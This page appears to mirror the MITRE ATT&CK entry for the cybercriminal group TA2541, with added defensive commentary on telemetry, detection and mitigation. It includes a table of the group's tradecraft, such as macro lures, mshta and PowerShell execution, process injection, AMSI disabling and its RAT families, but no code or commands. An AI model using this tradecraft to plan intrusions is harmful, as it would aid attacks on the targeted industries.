G1018: TA2541
TA2541 is a cybercriminal group that has been targeting the aviation, aerospace, transportation, manufacturing, and defense industries since at least 2017. TA2541 campaigns are typically high volume and involve the use of commodity remote access tools obfuscated by crypters and themes related to aviation, transportation, and travel.[1][2]
Analyst context for executives and security teams
TA2541 matters because MITRE describes it as a cybercriminal group targeting aviation, aerospace, transportation, manufacturing, and defense since at least 2017, using high-volume campaigns, commodity remote access tools, crypters, and aviation/travel-themed lures. For leaders, the practical issue is not a novel zero-day profile; it is whether email, endpoint, logging, and response processes can handle repeated, obfuscated commodity RAT delivery attempts against operationally important sectors.
Executive priority
Prioritize validation where business operations depend on aviation, transportation, manufacturing, or defense workflows, or where staff are likely to receive travel- or logistics-themed messages. This object supports executive questions such as: can the organization prove it inspects high-volume email threats, detects commodity RAT execution and persistence, and preserves enough endpoint/network evidence for incident response? Because the relationship set includes obfuscation, user execution, PowerShell, WMI, scheduled tasks, process injection, and tool transfer, coverage should be treated as a layered resilience and audit-evidence issue rather than a single malware-signature problem.
Technical view
MITRE provides no official detection text for TA2541, so SOC and detection teams should validate coverage through the related software and techniques. The relationship set points to commodity RATs and spyware including NETWIRE, jRAT, Agent Tesla, Revenge RAT, njRAT, Imminent Monitor, WarzoneRAT, AsyncRAT, and the Snip3 crypter. Detection engineering should focus on the chain implied by the relationships: user interaction with malicious links or files, obfuscated or compressed payloads, execution through PowerShell/Visual Basic/WMI, persistence or execution via scheduled tasks, process injection or hollowing, basic host and internet connectivity discovery, and ingress transfer of additional tools.
Likely telemetry
- Email security and mail gateway logs for high-volume themed lures, links, attachments, and delivery outcomes
- Endpoint process creation, command-line, parent-child process, script, and module/load telemetry
- PowerShell, WMI, Visual Basic, and scheduled task creation or execution logs
- Endpoint detection telemetry for packed, encoded, compressed, or otherwise obfuscated files
- Memory/process behavior telemetry relevant to process injection and process hollowing
Detection direction
- Do not rely only on static signatures; the supplied relationships include crypter use, software packing, encrypted/encoded files, and compression.
- Tune detections around suspicious execution chains after a user opens a file or clicks a link, especially when followed by scripting, WMI, scheduled tasks, or unexpected external connections.
- Map coverage for each related commodity RAT family where feasible, but treat family naming as secondary to behaviors such as remote access tooling, persistence, discovery, and ingress tool transfer.
- Review false positives carefully for administrative tools such as PowerShell, WMI, and scheduled tasks; prioritize unusual parent processes, user context, timing, destinations, and file locations.
- Validate cross-platform visibility where related software or techniques indicate Linux, macOS, Android, ESXi, IaaS, network device, or container relevance, while noting the TA2541 object itself does not specify platforms.
Mitigation priorities
- Strengthen email and web controls around malicious links, attachments, and high-volume social engineering themes relevant to aviation, transportation, and travel.
- Harden endpoint execution controls for script interpreters, WMI, scheduled tasks, and untrusted files, with special attention to Windows because many related software entries and techniques identify Windows support.
- Ensure endpoint protection and response tooling can inspect or at least surface packed, encoded, compressed, and crypter-obfuscated payload behavior.
- Restrict and monitor unnecessary outbound connectivity and file transfer paths so RAT command-and-control and ingress tool transfer are easier to detect and contain.
- Prepare incident response playbooks for commodity RAT intrusions, including host isolation, credential review where appropriate, persistence removal, and evidence preservation.
Analyst notes and limits
This take is based on the supplied MITRE ATT&CK group object, external references, and relationship context only. The most decision-relevant facts are the targeted industries, high-volume campaign description, aviation/transportation/travel themes, commodity RAT usage, and obfuscation through crypters. The relationship set provides practical behavior anchors for detection and response even though the group object itself has no tactics, platforms, or official detection guidance.
ATT&CK does not provide official detection text, platforms, or tactics on the TA2541 group object. Some platform and tactic guidance comes from related software and technique objects, not from a direct TA2541 platform declaration. Local mail flow, endpoint operating systems, logging maturity, and observed incident evidence are required before assessing exposure or detection coverage.
TA2541
TA2541 is a cybercriminal group that has been targeting the aviation, aerospace, transportation, manufacturing, and defense industries since at least 2017. TA2541 campaigns are typically high volume and involve the use of commodity remote access tools obfuscated by crypters and themes related to aviation, transportation, and travel.[1][2]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1608.001 | Upload Malware Sub-technique | TA2541 has uploaded malware to various platforms including Google Drive, Pastetext, Sharetext, and GitHub.CitationProofpoint TA2541 February 2022CitationCisco Operation Layover September 2021 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | TA2541 has placed VBS files in the Startup folder and used Registry run keys to establish persistence for malicious payloads.CitationProofpoint TA2541 February 2022 |
| Enterprise | T1573.002 | Asymmetric Cryptography Sub-technique | TA2541 has used TLS encrypted C2 communications including for campaigns using AsyncRAT.CitationCisco Operation Layover September 2021 |
| Enterprise | T1105 | Ingress Tool Transfer | TA2541 has used malicious scripts and macros with the ability to download additional payloads.CitationCisco Operation Layover September 2021 |
| Enterprise | T1568 | Dynamic Resolution | TA2541 has used dynamic DNS services for C2 infrastructure.CitationProofpoint TA2541 February 2022 |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | TA2541 has used file names to mimic legitimate Windows files or system functionality.CitationProofpoint TA2541 February 2022 |
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | TA2541 has used tools to search victim systems for security products such as antivirus and firewall software.CitationProofpoint TA2541 February 2022 |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | TA2541 has used scheduled tasks to establish persistence for installed tools.CitationProofpoint TA2541 February 2022 |
| Enterprise | T1027.002 | Software Packing Sub-technique | TA2541 has used a .NET packer to obfuscate malicious files.CitationCisco Operation Layover September 2021 |
| Enterprise | T1082 | System Information Discovery | TA2541 has collected system information prior to downloading malware on the targeted host.CitationProofpoint TA2541 February 2022 |
| Enterprise | T1685 | Disable or Modify Tools | TA2541 has attempted to disable built-in security protections such as Windows AMSI. CitationProofpoint TA2541 February 2022 |
| Enterprise | T1588.001 | Malware Sub-technique | TA2541 has used multiple strains of malware available for purchase on criminal forums or in open-source repositories.CitationProofpoint TA2541 February 2022 |
| Enterprise | T1218.005 | Mshta Sub-technique | TA2541 has used `mshta` to execute scripts including VBS.CitationCisco Operation Layover September 2021 |
| Enterprise | T1588.002 | Tool Sub-technique | TA2541 has used commodity remote access tools.CitationCisco Operation Layover September 2021 |
| Enterprise | T1204.001 | Malicious Link Sub-technique | TA2541 has used malicious links to cloud and web services to gain execution on victim machines.CitationProofpoint TA2541 February 2022CitationFireEye NETWIRE March 2019 |
| Enterprise | T1583.001 | Domains Sub-technique | TA2541 has registered domains often containing the keywords “kimjoy,” “h0pe,” and “grace,” using domain registrars including Netdorm and No-IP DDNS, and hosting providers including xTom GmbH and Danilenko, Artyom.CitationProofpoint TA2541 February 2022CitationCisco Operation Layover September 2021 |
| Enterprise | T1055 | Process Injection | TA2541 has injected malicious code into legitimate .NET related processes including regsvcs.exe, msbuild.exe, and installutil.exe.CitationProofpoint TA2541 February 2022CitationCisco Operation Layover September 2021 |
| Enterprise | T1059.001 | PowerShell Sub-technique | TA2541 has used PowerShell to download files and to inject into various Windows processes.CitationProofpoint TA2541 February 2022 |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | TA2541 has used compressed and char-encoded scripts in operations.CitationCisco Operation Layover September 2021 |
| Enterprise | T1016.001 | Internet Connection Discovery Sub-technique | TA2541 has run scripts to check internet connectivity from compromised hosts. CitationCisco Operation Layover September 2021 |
| Enterprise | T1055.012 | Process Hollowing Sub-technique | TA2541 has used process hollowing to execute CyberGate malware.CitationCisco Operation Layover September 2021 |
| Enterprise | T1047 | Windows Management Instrumentation | TA2541 has used WMI to query targeted systems for security products.CitationProofpoint TA2541 February 2022 |
| Enterprise | T1204.002 | Malicious File Sub-technique | TA2541 has used macro-enabled MS Word documents to lure victims into executing malicious payloads.CitationProofpoint TA2541 February 2022CitationCisco Operation Layover September 2021CitationTelefonica Snip3 December 2021 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | TA2541 has used VBS files to execute or establish persistence for additional payloads, often using file names consistent with email themes or mimicking system functionality.CitationProofpoint TA2541 February 2022CitationCisco Operation Layover September 2021 |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | TA2541 has used spearphishing e-mails with malicious links to deliver malware. CitationProofpoint TA2541 February 2022CitationTelefonica Snip3 December 2021 |
| Enterprise | T1027.015 | Compression Sub-technique | TA2541 has used compressed and char-encoded scripts in operations.CitationCisco Operation Layover September 2021 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | TA2541 has sent phishing emails with malicious attachments for initial access including MS Word documents.CitationProofpoint TA2541 February 2022CitationCisco Operation Layover September 2021 |
| Enterprise | T1583.006 | Web Services Sub-technique | TA2541 has hosted malicious files on various platforms including Google Drive, OneDrive, Discord, PasteText, ShareText, and GitHub.CitationProofpoint TA2541 February 2022 |
Groups, software, and campaigns
S1086: Snip3
Snip3 is a sophisticated crypter-as-a-service that has been used since at least 2021 to obfuscate and load numerous strains of malware including AsyncRAT, Revenge RAT, Agent Tesla, and NETWIRE.[1][2]
S0379: Revenge RAT
Revenge RAT is a freely available remote access tool written in .NET (C#).[1][2]
S0283: jRAT
S0670: WarzoneRAT
WarzoneRAT is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.[1][2]
S0434: Imminent Monitor
Imminent Monitor was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.[1]
S1087: AsyncRAT
S0198: NETWIRE
S0331: Agent Tesla
Agent Tesla is a spyware Trojan written for the .NET framework that has been observed since at least 2014.[1][2][3]
S0385: njRAT
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.1 | Current bundle | 4e43a137d034… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Proofpoint TA2541 February 2022
Larson, S. and Wise, J. (2022, February 15). Charting TA2541's Flight. Retrieved September 12, 2023.
Open source URL -
[2]
Cisco Operation Layover September 2021
Ventura, V. (2021, September 16). Operation Layover: How we tracked an attack on the aviation industry to five years of compromise. Retrieved September 15, 2023.
Open source URL -
[3]
mitre-attack G1018Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.